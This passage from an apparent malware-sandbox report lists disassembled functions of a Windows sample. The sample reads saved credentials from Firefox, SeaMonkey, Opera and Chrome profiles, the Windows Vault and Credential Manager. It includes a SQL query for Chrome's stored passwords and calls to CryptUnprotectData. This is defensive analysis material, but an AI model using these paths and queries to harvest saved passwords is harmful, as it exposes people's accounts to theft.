                                                  • Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411196, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143processlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
                                                  • memset.MSVCRT ref: 004111CB
                                                  • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                  • memset.MSVCRT ref: 00411253
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                  • free.MSVCRT(?), ref: 0041130D
                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                  • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 3536422406-1740548384
                                                  • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                  • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                  • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                  • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408441, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
                                                  • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
                                                  • wcslen.MSVCRT ref: 004084A5
                                                  • wcslen.MSVCRT ref: 004084AD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFindwcslen$FirstNext
                                                  • String ID:
                                                  • API String ID: 2163959949-0
                                                  • Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                  • Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
                                                  • Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                  • Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415F87, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                    • Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
                                                    • Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
                                                  • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 1355100292-0
                                                  • Opcode ID: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                  • Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
                                                  • Opcode Fuzzy Hash: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                  • Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004161B0, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004161BB
                                                  • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0
                                                  • Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                  • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                  • Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                  • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410168, Relevance: 56.4, APIs: 23, Strings: 9, Instructions: 441COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004101DA
                                                  • wcsrchr.MSVCRT ref: 004101F2
                                                  • memset.MSVCRT ref: 004102D9
                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                    • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                    • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                    • Part of subcall function 00408619: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                    • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                    • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                    • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                    • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                    • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                    • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                    • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                    • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                  • memset.MSVCRT ref: 004103AA
                                                  • memset.MSVCRT ref: 004103C6
                                                  • memset.MSVCRT ref: 004103E2
                                                  • memset.MSVCRT ref: 004104F9
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                    • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                    • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                    • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                  • wcslen.MSVCRT ref: 00410437
                                                  • wcslen.MSVCRT ref: 00410446
                                                  • wcslen.MSVCRT ref: 0041048B
                                                  • wcslen.MSVCRT ref: 0041049A
                                                  • memset.MSVCRT ref: 00410562
                                                  • memset.MSVCRT ref: 0041057A
                                                  • wcslen.MSVCRT ref: 00410593
                                                  • wcslen.MSVCRT ref: 004105A1
                                                  • wcslen.MSVCRT ref: 004105FC
                                                  • wcslen.MSVCRT ref: 0041060A
                                                  • memset.MSVCRT ref: 0041068A
                                                  • wcslen.MSVCRT ref: 00410699
                                                  • wcslen.MSVCRT ref: 00410720
                                                  • wcslen.MSVCRT ref: 0041072E
                                                  • wcslen.MSVCRT ref: 004106A7
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                    • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                    • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                  • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                  • API String ID: 3717286792-109336846
                                                  • Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                  • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                  • Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                  • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E2F1, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                    • Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                    • Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                    • Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040E319
                                                  • GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
                                                  • EnumResourceTypesW.KERNEL32 ref: 0040E339
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
                                                  • DeleteObject.GDI32(?), ref: 0040E4E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 3591293073-28296030
                                                  • Opcode ID: c7f6c6ad16e89a48cb0e0d64ac08aa0b3efbd1f5f4a19e75b38d6438d40399e7
                                                  • Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
                                                  • Opcode Fuzzy Hash: c7f6c6ad16e89a48cb0e0d64ac08aa0b3efbd1f5f4a19e75b38d6438d40399e7
                                                  • Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004422C7, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                  • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                  • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                  • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                  • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                  • API String ID: 2238633743-2107673790
                                                  • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                  • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                  • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                  • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408B10, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
                                                    • Part of subcall function 00408836: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                    • Part of subcall function 00408836: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                    • Part of subcall function 00408836: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                    • Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                    • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                  • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                  • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                  • DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                    • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                    • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                    • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                    • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                  • WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                  • CloseHandle.KERNEL32(?), ref: 00408C30
                                                  • CloseHandle.KERNEL32(?), ref: 00408C35
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408C3A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408C3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWritememset
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                  • API String ID: 2121777953-4002013007
                                                  • Opcode ID: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                  • Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
                                                  • Opcode Fuzzy Hash: 605df682aca1a4ff42ceeac8dd6110a0503dbbb848fd46321c54b31420e585a4
                                                  • Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402846, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 239fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040286E
                                                  • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
                                                  • memset.MSVCRT ref: 004028C7
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A
                                                    • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
                                                    • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
                                                    • Part of subcall function 004074C6: GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00407506
                                                  • memset.MSVCRT ref: 0040293C
                                                    • Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
                                                    • Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C
                                                    • Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07
                                                    • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                    • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                    • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  • memset.MSVCRT ref: 00402A95
                                                  • memcpy.MSVCRT ref: 00402AA8
                                                  • LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2
                                                  Strings
                                                  • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
                                                  • chp, xrefs: 0040288D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
                                                  • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                  • API String ID: 3603309061-1844170479
                                                  • Opcode ID: 99d4842a7612bd86dcae5b842672bed75adad362ebd04f8eaabe29f208d39f1f
                                                  • Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
                                                  • Opcode Fuzzy Hash: 99d4842a7612bd86dcae5b842672bed75adad362ebd04f8eaabe29f208d39f1f
                                                  • Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F0D5, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F0F8
                                                  • memset.MSVCRT ref: 0040F10D
                                                  • memset.MSVCRT ref: 0040F122
                                                  • memset.MSVCRT ref: 0040F137
                                                  • memset.MSVCRT ref: 0040F14C
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcslen.MSVCRT ref: 0040F172
                                                  • wcslen.MSVCRT ref: 0040F183
                                                  • wcslen.MSVCRT ref: 0040F1BB
                                                  • wcslen.MSVCRT ref: 0040F1C9
                                                  • wcslen.MSVCRT ref: 0040F202
                                                  • wcslen.MSVCRT ref: 0040F210
                                                  • memset.MSVCRT ref: 0040F296
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 2775653040-2068335096
                                                  • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                  • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                  • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                  • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F2E6, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F309
                                                  • memset.MSVCRT ref: 0040F31E
                                                  • memset.MSVCRT ref: 0040F333
                                                  • memset.MSVCRT ref: 0040F348
                                                  • memset.MSVCRT ref: 0040F35D
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcslen.MSVCRT ref: 0040F383
                                                  • wcslen.MSVCRT ref: 0040F394
                                                  • wcslen.MSVCRT ref: 0040F3CC
                                                  • wcslen.MSVCRT ref: 0040F3DA
                                                  • wcslen.MSVCRT ref: 0040F413
                                                  • wcslen.MSVCRT ref: 0040F421
                                                  • memset.MSVCRT ref: 0040F4A7
                                                    • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                    • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  • API String ID: 2775653040-3369679110
                                                  • Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                  • Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
                                                  • Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                  • Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041139E, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2238633743-70141382
                                                  • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                  • Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
                                                  • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                  • Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408619, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                    • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                  • wcslen.MSVCRT ref: 00408678
                                                  • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                  • memset.MSVCRT ref: 00408725
                                                  • memcpy.MSVCRT ref: 00408746
                                                  • _wcsnicmp.MSVCRT ref: 0040878B
                                                  • wcschr.MSVCRT ref: 004087B3
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
